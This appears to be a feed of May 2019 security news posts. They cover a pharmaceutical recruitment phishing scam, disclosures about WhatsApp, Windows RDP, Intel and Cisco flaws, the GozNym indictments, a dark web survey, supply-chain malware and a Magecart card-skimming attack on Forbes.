Either way, the final step of the crooks’ plan is to ask for financial details to pay the employee’s salary into. They will instead use the details to steal money, before cutting all ties with the victim.

Why it’s so successful

Recruitment fraud seems like one of the more obvious scams to spot. How could anyone’s alarm not be raised if they are offered a job without an interview?

Unfortunately, red flags like that are ignored in all kinds of phishing scams, and this scheme is a perfect example of why that happens. Most of us know how disheartening it is to send off application after application knowing that you probably won’t ever hear anything back. It’s therefore completely understandable that curiosity and/or hope might get the better of you when you hear that you’re not only in consideration but have also been offered a job.

Sure, you’re likely to be a little suspicious, but it’s a highly respected organisation like GlaxoSmithKline or AstraZeneca, so it must be legitimate, right?

It’s only in retrospect that you see all the clues that should’ve confirmed your suspicions.

What should you be looking for?

GlaxoSmithKline says job hunters can determine the legitimacy of an advert by asking:

  • Are there major spelling or grammatical errors in the communication?
  • What is the sender’s email address? Does this seem consistent with previous communications?
  • Who is sending the email? Search the name online to determine whether it’s a real employee and whether they are the appropriate person to be managing the application process.

It adds that an advert posted by a third party isn’t necessarily fraudulent, but recommends that job hunters research the company to see if they represent the organisation.

It’s not the end of the world if you don’t spot a scam during the application process. The crooks will have your contact details and any other information on your CV, but at least they won’t have your financial details. Preventing that from happening is simple, provided you remain cautious.

AstraZeneca and GlaxoSmithKline remind job hunters that they never ask for money during the recruitment process (no legitimate organisation would). The latter adds that:

If you receive a genuine job offer of a job with us, whether the offer is made directly by us or through an agency, you will not be required to pay any money towards administration fees.

We also recommend that you do not disclose personal or financial details to anyone you do not know.

As is standard, GlaxoSmithKline says that interviewees or those who have been offered jobs might be asked to provide passport information or other personal identification, such as a National Insurance number.

If you receive and accept a job offer, you will obviously have to provide financial information; this will typically be at the same time as you sign your employee contract. However, you should only be asked for account information, which is used to deposit funds, rather than the card number, which is used to withdraw funds.

Can you spot a phishing scam?

The warnings issued by AstraZeneca and GlaxoSmithKline show just how big of a threat phishing poses. The methods for spotting and preventing it are the same no matter what form the scam takes, yet millions of people fall victim in both personal and work environments.

When it comes to recruitment scams, it’s up to individuals to protect their own data, but organisations have a lot more at stake. An employee who can’t spot a malicious email is liable to hand over vast amounts of sensitive information or expose the organisation to further threats. For example, most ransomware attacks are spread via phishing emails.

Organisations can tackle that threat with our Phishing and Ransomware – Human patch e-learning course.

This ten-minute course explains the basics of email-based threats, showing staff how to spot and avoid phishing scams and ransomware.

The post Pharmaceutical companies exploited by phishing scam targeting job seekers appeared first on IT Governance Blog.

WhatsApp, Microsoft and Intel Chip Vulnerabilities

Quickly applying software updates (patching) to mitigate security vulnerabilities is a cornerstone of both a home and business security strategy. So it was interesting to see how the mainstream news media reported the disclosure of three separate ‘major’ security vulnerabilities this week, within WhatsApp, Microsoft Windows and Intel Processors.


The WhatsApp security flaw by far received the most the attention of the media and was very much the leading frontpage news story for a day. The WhatsApp vulnerability (CVE-2019-3568) impacts both iPhone and Android versions of the mobile messaging app, allowing an attacker to install surveillance software, namely, spyware called Pegasus, which access can the smartphone's call logs, text messages, and can covertly enable and record the camera and microphone.

From a technical perspective, the vulnerability (CVE-2019-3568) can be exploited with a buffer overflow attack against WhatsApp's VOIP stack, this makes remote code execution possible by sending specially crafted SRTCP packets to the phone, a sophisticated exploit.

Should you be concerned?

WhatsApp said it believed only a "select number of users were targeted through this vulnerability by an advanced cyber actor." According to the FT, that threat actor was an Israeli company called ‘NSO Group’. NSO developed the exploit to sell on, NSO advertises it sells products to government agencies "for fighting terrorism and aiding law enforcement investigations". NSO products (aka "spyware") is known to be used by government agencies in UAE, Saudi Arabia and Mexico.

So, if you are one of the 1.5 billion WhatsApp users, not a middle-east political activist or a Mexican criminal, you probably shouldn’t too worry about your smartphone being exploited in the past. If you were exploited, there would be signs, with unusual cliches and activity on your phone.  Despite the low risk at present, all WhatsApp users should quickly update their WhatsApp app before criminals attempt to ‘copycat’ NSO Group exploitation.

How to Prevent 

Update the WhatsApp app.

  • Open the Apple AppStore App
  • Search for WhatsApp Messenger
  • Tap 'Update' and the latest version of WhatsApp will be installed
  • App Version 2.19.51 and above fixes the vulnerability
  • Open Google Play Store
  • Tap the menu in the top left corner
  • Go to “My Apps & Games”
  • Tap ‘Update’ next to WhatsApp Messenger and the latest version of WhatsApp will be installed
  • App Version 2.19.134 and above fixes the vulnerability
Microsoft Worm Vulnerability CVE-2019-0708
Making fewer media headlines was the announcement of a new “wormable” vulnerability discovered within the various versions of the Microsoft’s Windows operating system.  The vulnerability CVE-2019-0708 is within Window's “remote desktop services” component.

This vulnerability is by far the most dangerous vulnerability reported this week, probably this year, it is a similar flaw to what the WannaCry malware exploited on mass in May 2017. WannaCry was a ransomware worm which severely impacted the operation of several large organisations, including the NHS. It exploited a similar Microsoft Windows vulnerability which enabled the malware to quickly self-propagate (worm) across networks and infecting vulnerable systems on mass with ransomware, rendering such systems unusable.

Such is the concern of a second WannaCry style attack due to this flaw, Microsoft has taken the rare step of releasing security patches for their unsupported versions of the Windows operating system, such as Windows XP and Windows Server 2003. 

How to Prevent
Apply the latest Microsoft Windows Update. Microsoft has said anti-virus products will not provide any protection against the exploitation of this vulnerability, therefore applying the Microsoft May 2019 Security Update, as released on Tuesday 14th May 2019, is the only way to be certain of protecting against the exploitation of this critical vulnerability 

Ensure automatic updates is always kept switched on. Windows by default should attempt to download and install the latest security updates, typically you will be prompted to apply the update and accept a reboot, do this without delay. 

To double check, select the Start menu, followed by the gear cog icon on the left. Then, select Update & Security and Windows Update.

Businesses must also seek to apply Microsoft security updates as soon as they are released. Typically large organisations control the release of Microsoft security patches centrally, they should monitor and risk assess the importance of newly released security updates, and then apply across their IT estate at a rate based on risk.

Intel CPU ZombieLoad Vulnerability
There was little mainstream coverage about a third major security vulnerability reported this week. Coined 'ZombieLoad side-channel processor', this vulnerability is present in almost every Intel processor made since 2011. This hardware vulnerability is a concern to businesses which use or provide cloud services. This flaw can also be mitigated by patching, with Microsoft, Apple, Amazon and Google all releasing security patches. For further information about the Intel CPU vulnerability, read the following posts.

CVE-2019-0708 – A Critical “Wormable” Remote Code Execution Vulnerability in Windows RDP

This is an important security advisory related to a recently patched Critical remote code execution vulnerability in Microsoft Windows Remote Desktop Service (RDP). The vulnerability is identified as “CVE-2019-0708 – Remote Desktop Services Remote Code Execution Vulnerability”. MSRC blog mentions This vulnerability is pre-authentication and requires no user interaction. In other…

New infosec products of the week: May 17, 2019

Alcide launches continuous security and hygiene scanner for Kubernetes and Istio Alcide Advisor is a continuous security and hygiene scanner for Kubernetes & Istio, which automatically scans for the widest range of compliance, security and governance risks and vulnerabilities. Already deployed in numerous customer environments, and fully integrated with the CI/CD pipeline, it empowers engineering teams to maintain engineering motion and identify security drifts and risks, even before they are introduced to production. Keysight Technologies … More

The post New infosec products of the week: May 17, 2019 appeared first on Help Net Security.

How can we give cybersecurity analysts a helping hand?

It’s tough being a cybersecurity analyst these days. Over the last few years we have been repeatedly reminded of the challenge they are now facing, primarily through the steady stream of high-profile data breaches that have hit the headlines. In the last month alone Microsoft has been in the news after suffering a breach that enabled hackers to access customer email accounts, while a breach at beleaguered social giant Facebook was believed to have left … More

The post How can we give cybersecurity analysts a helping hand? appeared first on Help Net Security.

Stack Overflow’s Production Systems Accessed by Hackers

In a brief announcement yesterday, Stack Overflow reports that it was the target of an attack that led hackers to access its production systems.

The website is currently online and the few public details provided in a short message indicate that a survey revealed that a “level of production access was obtained on May 11”.

User data are safe

It is not clear how the intruders were able to access the internal Stack Overflow network, but the actions taken as a result of the violation includes the patching all known vulnerabilities. The incident was discovered internally and the initial assessment is that no customer or user data has been affected.

“Our customers’ and users’ security is of the utmost importance to us. After we conclude our investigation cycle, we will provide more information,” says Mary Ferguson, VP of Engineering at Stack Overflow.

Stack Overflow was launched in 2008 as a website for questions and answers about programming themes. As part of the Stack Exchange Network, it is a community of more than 10 million as on January 2019.

Stack Overflow is available in several languages (English, Spanish, Russian, Portuguese and Japanese). According to the website, more than 50 million visitors access it every month, looking for ways to solve their problems, develop their skills or find work.

The platform is considered as a reliable source for an overview of accurate trends in the developer community, as well as pay package information based on experience, location, training, and technology.



Related Resources:

Hackers Steal Around $41 Million in Bitcoin from Binance

Yet Another WordPress Hack Exploiting Plugin Vulnerabilities

The post Stack Overflow’s Production Systems Accessed by Hackers appeared first on .

Memory analysis is the ground truth

In recent years, enterprises have adopted next-gen endpoint protection products that are doing an admirable job detecting anomalies. For example, searching for patterns such as remote access to memory, modification of specific registry keys and alerting on other suspicious activities. However, typically anomalies only provide us with an indication that something is wrong. In order to understand the root problem, respond and ensure that a machine is entirely clean, we must search for the malicious … More

The post Memory analysis is the ground truth appeared first on Help Net Security.

The largest breaches over the past three years have caused massive and irreparable damage

Publicly traded companies suffering the worst data breaches averaged a 7.5 percent decrease in stock price, a Bitglass report reveals. Bitglass researched the three largest data breaches of publicly traded companies from each of the last three years in order to uncover cybersecurity trends and demonstrate the extensive damage that can be done by improper security. Among the incidents detailed in the Kings of the Monster Breaches report are the Marriott breach of 2018, the … More

The post The largest breaches over the past three years have caused massive and irreparable damage appeared first on Help Net Security.

Half of companies missed GDPR deadline, 70% admit systems won’t scale

Even if given two years notice to achieve GDPR compliance, only half of companies self-reported as compliant by May 25, 2018, a DataGrail survey reveals. “The Age of Privacy: The Cost of Continuous Compliance” report benchmarks the operational impact of the European General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA), as well as sharing insights into lessons learned and attitudes toward privacy regulations. DataGrail surveyed more than 300 U.S. privacy management … More

The post Half of companies missed GDPR deadline, 70% admit systems won’t scale appeared first on Help Net Security.

Analysis of device data shines a light on cybersecurity risks in healthcare

The convergence of IT, IoT and OT makes it more difficult for the healthcare industry to manage a wide array of hard-to-control network security risks. IoT and OT devices are rapidly increasing in numbers, but traditional IT still represents the most vulnerable attack surface, according to the Forescout Technologies report. Forescout Technologies announced insights from 75 real healthcare deployments with more than 10,000 virtual local area networks (VLANs) and 1.5 million devices contained within the … More

The post Analysis of device data shines a light on cybersecurity risks in healthcare appeared first on Help Net Security.

Data will be processed by edge computing in 59% of IoT deployments by 2025

Edge computing is on the rise in IoT deployments and is expected to show solid growth over the coming years, according to Strategy Analytics most recent report. Strategy Analytics believes that data will be processed (in some form) by edge computing in 59% of IoT deployments by 2025. The driving forces in this assumption are the key benefits derived from edge computing, namely more efficient use of the network, security and response time. Currently, Strategy … More

The post Data will be processed by edge computing in 59% of IoT deployments by 2025 appeared first on Help Net Security.

Entrust Datacard unveils new cloud-based solution hosted in a PCI-CP-certified data center

Entrust Datacard launched of a new cloud-based solution that enables banks to instantly personalize and activate customer payment cards. Whether buying coffee or shopping online, consumers expect instant service and fast delivery. Getting a new debit or credit card, or replacing a lost or stolen card is no different. Secure instant issuance allows banks to issue customers a permanent, personalized payment card on demand. They have access to their card, funds and services, in just … More

The post Entrust Datacard unveils new cloud-based solution hosted in a PCI-CP-certified data center appeared first on Help Net Security.

ASG-Enterprise Orchestrator enhancements to enable end-to-end value stream control

ASG Technologies, a trusted provider of proven solutions for information access, management and control for the world’s top enterprises, unveiled ASG-Enterprise Orchestrator, which delivers cross-technology stack orchestration of critical enterprise value streams. Spanning capabilities from mainframe to cloud, ASG-Enterprise Orchestrator offers workload automation, value stream visibility and DevOps tool-chain coordination required to optimize value streams. It delivers control from a single view and choreographs work across a broad spectrum of technology stacks and software packages. … More

The post ASG-Enterprise Orchestrator enhancements to enable end-to-end value stream control appeared first on Help Net Security.

Tata Communications and Cisco to offer enterprises a secure multi-cloud native hybrid network

The leading global digital infrastructure provider Tata Communications and Cisco have extended their partnership to enable enterprises to transform their legacy network to a customised and secure multi-cloud native hybrid network. The combination of Tata Communications’ IZO cloud enablement platform and Cisco SD-WAN is a fully-managed, global solution that gives businesses greater control over their digital infrastructure, the ability to securely connect any user to any application location, and provide the assurance of application performance … More

The post Tata Communications and Cisco to offer enterprises a secure multi-cloud native hybrid network appeared first on Help Net Security.

Laptop Running Six Most Dangerous Malware up for Auction

This is news! A laptop containing six of the most dangerous of malware created till date is up for auction.

A Samsung NC10-14GB 10.2-Inch Blue Netbook, which contains six such malware strains which together have caused damages worth $95B over the years, has been put up for auction. This laptop has in fact been isolated and airgapped so as to prevent the spread of the malware that it contains. (Well, we know that if you are an expert, you might be cynical about the effectiveness of airgapping; but technically speaking, it’s supposed to help curb the spread of malware!).

It’s illegal to sell malware for operational purposes in the U.S. The seller of the malware-packed laptop, as per reports, has devised a way to get around this issue by calling it art. This laptop, which runs on Windows XP SP3, is now called ‘The Persistence of Chaos’.

A Forbes report dated May 15, 2019, says, “The singular laptop is an air-gapped Samsung NC10-14GB 10.2-Inch Blue Netbook (2008) running Windows XP SP3 and loaded with the malware and restart script. It also comes with a power cord, just in case the 11-year-old battery isn’t still holding a viable charge.” The report further adds, “It’s currently sitting on a white cube in a room somewhere in New York City and is being sold under the guise of art as “The Persistence of Chaos”. It’s certainly subversive and skirts the legalities of selling malware (it’s illegal to sell for operational purposes), but hey, anarchy is entertaining.”

The infected laptop is a creation of performance artist Guo O Dong in collaboration with cybersecurity company Deep Instinct. Curtis Silver, who has authored the Forbes report, has quoted Guo O Dong as telling him via email, “I created The Persistence of Chaos because I wanted to see how the world responds to and values the impact of malware.”

The six strains of malware that the laptop contains are

WannaCry – The ransomware that spread all across the world and made a devastating impact on over 200,000 computers across over 150 countries.

Mydoom – The fastest-spreading email worm till date, Mydoom was first seen in January 2004 and worked mainly by sending junk email through infected computers and at the same time appearing as a transmission error.

Sobig – First detected to be infecting computer systems in August 2003, this malware, which is a worm and a trojan, is the second fastest spreading worm as of 2018. It deactivated itself in September 2003.

BlackEnergy – The malware that was first seen in 2007 and then worked by generating bots for executing DDoS attacks that were distributed via email spam. At a later stage of evolution, it would drop an infected DLL component directly to the local application data folder.

ILOVEYOU – This malware, which spread through an email attachment ‘LOVE-LETTER-FOR-YOU.txt.vbs’, was sent from an infected person to people in his contact list. Once the attachment gets opened, a script is started that would overwrite random types of files- Office files, audio files, image files, etc. Seen since May 2000.

DarkTequila – This malware, which has been active since 2013 and seen impacting systems in Latin America, spreads through spear phishing and infected USB drives. Hackers use DarkTequila to steal corporate data, bank credentials, and personal data as well.

Curtis Silver observes in his Forbes report, “On a base level the goal if we believe light grey text on a white background, is to sell this malware infused laptop under the blanket of art for academic purposes. On a deeper level, it’s a statement of social anarchy, of controlled chaos and an exposé of how fragile our machine-connected lives really are.”

This is a very relevant observation because news relating to this laptop (if it has all the malware that it claims to have), is in all respects, a worrying thing.

Also, Read:

Wolters Kluwer Cloud Accounting & Tax System Down To Malware Attack

The Fileless Malware Attacks Are Here To Stay

Japanese Government to Deploy Defensive Malware

Kodi Hardware Add-on Users, Mostly At Risk With Malware

BabyShark Malware Targeting Nuclear and Cryptocurrency Industries

The post Laptop Running Six Most Dangerous Malware up for Auction appeared first on .

Onapsis appoints Gerhard Eschelbeck to board of directors

Onapsis, the global leader in business application cyber resilience, announced the appointment of former Google Vice President Security & Privacy Engineering (CISO) Gerhard Eschelbeck to the company’s board of directors. Eschelbeck brings strong experience in transforming traditional security solutions and delivering them through the cloud, which will help Onapsis guide customers to the cloud with confidence. A proven information technology executive with strong operational and strategic experience, Eschelbeck has launched innovative and successful companies and … More

The post Onapsis appoints Gerhard Eschelbeck to board of directors appeared first on Help Net Security.

Feds Target $100M ‘GozNym’ Cybercrime Network

Law enforcement agencies in the United States and Europe today unsealed charges against 11 alleged members of the GozNym malware network, an international cybercriminal syndicate suspected of stealing $100 million from more than 41,000 victims with the help of a stealthy banking trojan by the same name.

The locations of alleged GozNym cybercrime group members. Source: DOJ

The indictments unsealed in a Pennsylvania court this week stem from a slew of cyber heists carried out between October 2015 and December 2016. They’re also related to the 2016 arrest of Krasimir Nikolov, a 47-year-old Bulgarian man who was extradited to the United States to face charges for allegedly cashing out bank accounts that were compromised by the GozNym malware.

Prosecutors say Nikolov, a.k.a. “pablopicasso,” “salvadordali,” and “karlo,” was key player in the GozNym crime group who used stolen online banking credentials captured by GozNym malware to access victims’ online bank accounts and attempt to steal their money through electronic funds transfers into bank accounts controlled by fellow conspirators.

According to the indictment, the GozNym network exemplified the concept of ‘cybercrime as a service,’ in that the defendants advertised their specialized technical skills and services on underground, Russian-language, online criminal forums. The malware was dubbed GozNym because it combines the stealth of a previous malware strain called Nymaim with the capabilities of the powerful Gozi banking trojan.

The feds say the ringleader of the group was Alexander Konovolov, 35, of Tbilisi, Georgia, who controlled more than 41,000 victim computers infected with GozNym and recruited various other members of the cybercrime team.

Vladimir Gorin, a.k.a “Voland,”  “mrv,” and “riddler,” of Orenburg, Russia allegedly was a malware developer who oversaw the creation, development, management, and leasing of GozNym.

The indictment alleges 32-year-old Eduard Malancini, a.k.a. “JekaProf” and “procryptgroup” from Moldova, specialized in “crypting” or obfuscating the GozNym malware to evade detection by antivirus software.

Four other men named in the indictment were accused of recruiting and managing “money mules,” willing or unwitting people who can be used to receive stolen funds on behalf of the criminal syndicate. One of those alleged mule managers — Farkhad Rauf Ogly Manokhim (a.k.a. “frusa”) of Volograd, Russia was arrested in 2017 in Sri Lanka on an international warrant from the United States, but escaped and fled back to Russia while on bail awaiting extradition.

Also charged was 28-year-old Muscovite Konstantin Volchkov, a.k.a. “elvi,”  who allegedly provided the spamming service used to disseminate malicious links that tried to foist GozNym on recipients who clicked.

The malicious links referenced in those spam emails were served via the Avalanche bulletproof hosting service, a distributed, cloud-hosting network that for seven years was rented out to hundreds of fraudsters for use in launching malware and phishing attacks. Avalanche was dismantled in Dec. 2016 by a similar international law enforcement action.

The alleged administrator of the Avalanche bulletproof network — 36-year-old Gennady Kapkanov from Poltova, Ukraine — has eluded justice in prior scrapes with the law: During the Avalanche takedown in Dec. 2016, Kapkanov fired an assault rifle at Ukrainian police who were trying to raid his apartment.

After that incident, Ukrainian police arrested Kapkanov and booked him on cybercrime charges. But a judge later ordered him to be released, saying the prosecution had failed to file the proper charges. The Justice Department says Kapkanov is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network.

The five Russian nationals charged in the case remain at large. The FBI has released a “wanted” poster with photos and more details about them. The Justice Department says it is working with authorities in Georgia, Ukraine and Moldova to build prosecutions against the defendants in those countries.

Nikolov entered a guilty plea in federal court in Pittsburgh on charges relating to his participation in the GozNym conspiracy on April 10, 2019.  He is scheduled to be sentenced on Aug. 30, 2019.

It’s good to see this crime network being torn apart, even if many of its key members have yet to be apprehended. These guys caused painful losses for many companies — mostly small businesses — that got infected with their malware. Their activities and structure are remarkably similar to that of the “Jabberzeus” crime gang in Ukraine that siphoned $70 million – out of an attempted $220 million — from hundreds of U.S.-based small to mid-sized businesses several years ago.

The financial losses brought about by that gang’s string of cyberheists — or at least the few dozen heists documented in my series Target: Small Business — often caused victim companies to lay off employees, and in some cases go out of business entirely.

A copy of the GozNym indictment is here (PDF).

Past, present, and future of the Dark Web

Which is the difference between the Deep Web and Dark Web? Considerations about past, present, and future of the Dark Web.

These are intense days for the Dark Web. Operations conducted by law enforcement agencies lad to the arrests of many individuals and the closure of the most popular Black Marketplaces, many of which remained alive over the years.

Operators behind the principal black markets made a lot of money, let’s think of managers of the Wall Street Market and Valhalla recently seized by feds. These are historic points of aggregations where it was possible to buy drugs, weapons, and any kind of hacking tools.

The icing on the cake was a US research that decreed how the size of the Dark Web was significantly lower than previously thought. This isn’t a novelty for the experts that are studying dark web and its evolution.

Unfortunately there is too much confusion between the term deep web and dark web, many videos on YouTube channels provide wrong information. Misinterpretation, superficiality, some times simple profits, these are the root cause of the confusion. This misinformation is extremely dangerous for kids, first consumers of videos published on the principal social media platform. Some videos show that is very simple to buy drugs securely or explain how to hack a website. Describing these phenomena, some journalists have been labeled “as experts on the dark web”.

The Dark Web is just a portion of the Deep Web, its access is quite simple and doesn’t require any specific technological skill. It is very easy to access to the Tor network or browse content on other anonymizing networks like I2P.

I started this research on September 2016, when I started writing my my book, “The Prison of the Humanity – from the deep web to 4.0 the new digital prisons”.


Dark Web 1

An Iceberg has always been used as a visual representation of the Internet world. The visible peak, which represents the smallest part of the iceberg, that many have mistakenly associated with the clear web: is the part reachable by search engines.

Even a child could easily wonder: how can billions of sites visible to internet users represent 5% of the internet itself?

Exactly, how?

The Deep Web is composed of the content of the www that is not indexed by search engines. Try to imagine the site of a Provider that offers voice or connectivity services to millions of people, families and companies. Its files are not indexable by search engines. Try to think of a banking site with millions of account holders who keep the history of transactions, deposits, investments for years and years, without obviously being accessible to the entire web population.

Let’s also include all information by the IOT devices that are connected online by that that cannot be accessed for obvious reasons.

Well, not you can have an idea about the dimension of the deep web.


What is the Dark Web? It is a non-indexed subset of the Deep Web. Accessible through TOR and other software, it has a size that is incalculable if we use imagination. In fact, there could be many .onion sites, an extension of the domains inside the TOR network, which are not indicated by the Hidden Wiki, a sort of Wikipedia of onion Links. Furthermore, each website can have sublevels that could reach infinity.

But here we talk about legends. We go into the merits of my research which is based on the facts and experience of three years of journalistic navigation in the Dark Web where not only do you have browsed dozens of Directories, but you have visited at least 100,000 sites.

My search is based on 100,000 sites that I have personally visited and that can be easily classified into very few categories that I will explain to you with brief descriptions:


The spirit of the Dark Web includes precisely the freedom of expression with portals that give “uncomfortable” or “alternative” news in countries where there is censorship. There are many sites in multiple languages ​​that refer to ideological and collective movements, due to the greater number of Anarchist derivations, but there are also movements that promote the defense of online privacy. So there is so much counter-information and the most obvious example that I always carry forward is the version of the Bible translated into the languages ​​of the countries where it is strictly prohibited.

Black Markets:

They are the heart of the Dark Web in economic terms, needless to say that it is impossible to count them verify their reliability, but they are certainly the points of aggregation for several million users and unscrupulous sellers that offer drugs, weapons, medicines requiring medical prescription, bank credential and personal data of unsuspecting users, steroids and hacking guides.

Empty or non-functional web pages:

Empty pages, typical errors displaying code 404 that feed the list of the .onion domains in the directories.


There are many sites that promise the same services as Black Markets, including hitman services, hacking services, money laundering services… but they are only services operated by scammers.

Directories – Search Engines

There are many directories that offer the same links, Hidden Wiki services that offer a guide to the principal links in the Dark Web, but it is clear that the hidden Wiki is one and the original not only reports the links to the sites but also provides an “obscure and forbidden” encyclopedia service similar to the best known Wikipedia. The presence of search engines that are similar to Google are also frequent, but they do not always find the result that they hope for.

Child pornography-pornography-violence on animals-GORE

There are many pornographic sites on the clear web, but pornography in the dark web takes on gruesome tones. Violence, child abuse, snuff movies and extreme sex are very common. The sites that belong to these categories are divided into different types: chat rooms, traditional websites or service containers. The chats are usually open and there is a remarkable exchange of multimedia files for free. Then there are the forums that need registration, they offer audio/video content or images, and also provide suggestions on how to kill people or how to eat them in ritual cannibalism. Furthermore, there are many child pornography sites on the dark web that point to the largest online sharing platforms, such as Satoshi box or Megaupload, where it is possible to pay to download packages of illegal content.

Websites – Forums

They are normal websites that deal with different topics, including forums that represent meeting points for users that discuss legal and non-legal issues. There are many blogs that for the greater part deal with issues of cybersecurity and the rights of the digital population in terms of consumer protection and privacy.


Consider sites belonging to the above categories, in many cases they are traps set up by the law enforcement agencies to attempt to identify criminals. The dark web is full of honeypots.


Let’s conclude with some statistic on the composition of the Dark Web:

  • Not Working: 45%
  • Scam: 44%
  • Websites – Forums: 6%
  • Child pornography – Gore: 4%
  • Directories – search engines: 0.5%
  • Information: 0.3%
  • Black Markets: 0.2%

At this time, it is not possible to determine the exact number of Black Markets, anyway, it is really limited. Terrorism is an irrelevant phenomenon in terms of propaganda. It is also impossible to determine the diffusion of honeypots.

The real question is not how big is the Dark Web, but what will happen after the operations conducted law enforcement?

Who will be its users? Will Black Markets still exist?

Or is the Dark Web itself a honeypot for criminals, anarchists, terrorists and. pedophiles?

These doubts are legitimate, given that the military origins of the most popular anonymizing network.

About the Author: Livio Varriale

Pierluigi Paganini

(SecurityAffairs – Dark Web, crime)

The post Past, present, and future of the Dark Web appeared first on Security Affairs.

Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild

White hat hackers at Google Project Zero are tracking cyber attacks exploiting zero-days before the vendor released security fixes.

Experts at Google Project Zero are tracking cyber attacks exploiting zero-days as part of a project named 0Day ‘In the Wild.’

“Today, we’re sharing our tracking spreadsheet for publicly known cases of detected zero-day exploits, in the hope that this can be a useful community resource:

Spreadsheet link: 0day “In the Wild”

This data is collected from a range of public sources. We include relevant links to third-party analysis and attribution, but we do this only for your information;” reads the blog post published by Google Project Zero.

The experts are monitoring the zero-day vulnerabilities exploited by hackers before they became publicly disclosed or known to the vendor.


The project aims at tracking zero-days exploited in attacks covered by Project Zero researches.

The researchers collected the information in a shared spreadsheet that already includes over 100 vulnerabilities exploited in attacks since 2014.

The table includes the following information:

  • CVE ID;
  • Impacted Vendor and Product;
  • Description;
  • Discovery Date;
  • Date when the patch was released;
  • A link to the security advisory;
  • Claimed Attribution;

The list of vulnerabilities include zero-days affecting products from major vendors, including Adobe, Apple, Cisco, Facebook, Google, Microsoft, and Oracle.

The attacks tracked by the experts were carried out my popular threat actors, including APT3, APT28, APT31, APT37, DarkHotel, Equation Group, and Sandworm.

The project doesn’t cover zero-day exploits for software that reached end of life (EOL) by the time the flaw is discovered.

“The data described in the spreadsheet is nothing new, but we think that collecting it together in one place is useful.” concludes Google Project Zero.

Aggregating the data it is possible to extract useful information such as:

  • On average, a new “in the wild” exploit is discovered every 17 days (but in practice these often clump together in exploit chains that are all discovered on the same date);
  • Across all vendors, it takes 15 days on average to patch a vulnerability that is being used in active attacks;
  • A detailed technical analysis on the root-cause of the vulnerability is published for 86% of listed CVEs;
  • Memory corruption issues are the root-cause of 68% of listed CVEs

Pierluigi Paganini

(SecurityAffairs – zero-days, Google)

The post Google ‘0Day In the Wild’ project tracks zero-days exploited in the Wild appeared first on Security Affairs.

Profile of a Hacker: BiaSciLabs

Over the last twelve months our team has ramped up the number of public CMD+CTRL Cyber Range events we deliver at conferences, OWASP meetings, and Meetups. The feedback we have received has been great - people love learning how to hack in simulated, free form environments. In some cases the feedback we receive is so good that we need to share it with others in the form of profiles like Brandon Evans and Andre Gott.

More Attacks against Computer Automatic Update Systems

Last month, Kaspersky discovered that Asus's live update system was infected with malware, an operation it called Operation Shadowhammer. Now we learn that six other companies were targeted in the same operation.

As we mentioned before, ASUS was not the only company used by the attackers. Studying this case, our experts found other samples that used similar algorithms. As in the ASUS case, the samples were using digitally signed binaries from three other Asian vendors:

  • Electronics Extreme, authors of the zombie survival game called Infestation: Survivor Stories,
  • Innovative Extremist, a company that provides Web and IT infrastructure services but also used to work in game development,
  • Zepetto, the South Korean company that developed the video game Point Blank.

According to our researchers, the attackers either had access to the source code of the victims' projects or they injected malware at the time of project compilation, meaning they were in the networks of those companies. And this reminds us of an attack that we reported on a year ago: the CCleaner incident.

Also, our experts identified three additional victims: another video gaming company, a conglomerate holding company and a pharmaceutical company, all in South Korea. For now we cannot share additional details about those victims, because we are in the process of notifying them about the attack.

Me on supply chain security.

Critical Vulnerabilities in Cisco Products

Critical Vulnerabilities in Cisco Products

A high-risk vulnerability in Cisco's secure boot process was disclosed earlier this week by Cisco and Red Balloon Security and is believed to have affected an estimate 100 or more devices.

The vulnerability (CVE-2019-1649) is “in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality,” Cisco reported.

Additionally, Cisco reported that another vulnerability (CVE-2019-1862) in the “web-based user interface (Web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker to execute commands on the underlying Linux shell of an affected device with root privileges.”

The vulnerability, called Thrangrycat, affects millions of Cisco devices (including routers, switches and firewalls) and exposes a large number of corporate and government networks to remote attacks, according to Red Balloon Security.

Cisco also noted in regard to the Secure Boot vulnerability that it will release software patches, but there are no workarounds to address the issue.

An attacker could exploit this to gain full and permanent access to those networks. It also can't be fixed with a software patch, so it will be difficult for affected organizations to fully mitigate the threats this poses, according to Red Balloon Security.

“This is a significant security weakness which potentially exposes a large number of corporate, government and even military networks to remote attacks,” said Dr. Ang Cui, founder and chief scientist of Red Balloon Security, in a press release. 

“We're talking about tens of millions of devices potentially affected by this vulnerability, many of them located inside of sensitive networks. These Cisco products form the backbone of secure communications for these organizations, and yet we can exploit them to permanently own their networks. Fixing this problem isn't easy, because to truly remediate it requires a physical replacement of the chip at the heart of the Trust Anchor system. A firmware patch will help to offset the risks, but it won't completely eliminate them. This is the real danger, and it will be difficult for companies, financial institutions and government agencies to properly address this problem.”

Forbes Site Up, Then Down Again after Magecart Attack

Forbes Site Up, Then Down Again after Magecart Attack

Forbes was reportedly back online but went down again at 3:30 pm UTC after reports that the site was hit with the Magecart card-skimming malware, according to security researcher Troy Mursch.

Mursch tweeted on May 15 that Forbes had been infected with the Magecart malware, adding that customers who made a purchase while the site was compromised likely had their credit card information stolen. In a later tweet, Mursch confirmed that the malware had been removed.

Hackers apparently injected obfuscated JavaScript, which could be linked to the ongoing supply chain attacks that have been reported by Willem DeGroot this week. Forbes is, according to The Register, a customer of Picreel, which has been the victim of a supply chain attack.

Mursch reportedly sent several emails in an attempt to alert Forbes to the Magecart infection and reported the problem to the domain owner, yet he has not heard back from Forbes, The Register said.

“Threat actors have used several methods of attacking websites. There’s a trend, though, towards attacking the payment page supply chain, which offers the most bang for their buck because third parties offer direct links to a larger number of customers, including high-profile companies that would otherwise be harder to compromise,” said Mike Bittner, associate director of digital security and operations, The Media Trust.

“These pages are soft targets for several reasons. They run third-party code supplied by vendors who operate on very tight – sometimes negative – profit margins and must scrutinize every expense. Such businesses too often fail to give security and privacy the priority they require. Second, third-party code executes outside the website owner’s infrastructure, making them hard, if not impossible, to monitor without the right tools and expertise. Third, in many publications, these payment pages do not fall under the website operators’ rev ops teams, who make pivotal decisions on security and privacy.

“The bottom line here is that publishers should carefully vet ALL their third parties for security and privacy and conduct frequent audits to ensure they have adequate security measures in place. Because every one of their third parties is likely not only vulnerable but under attack.”

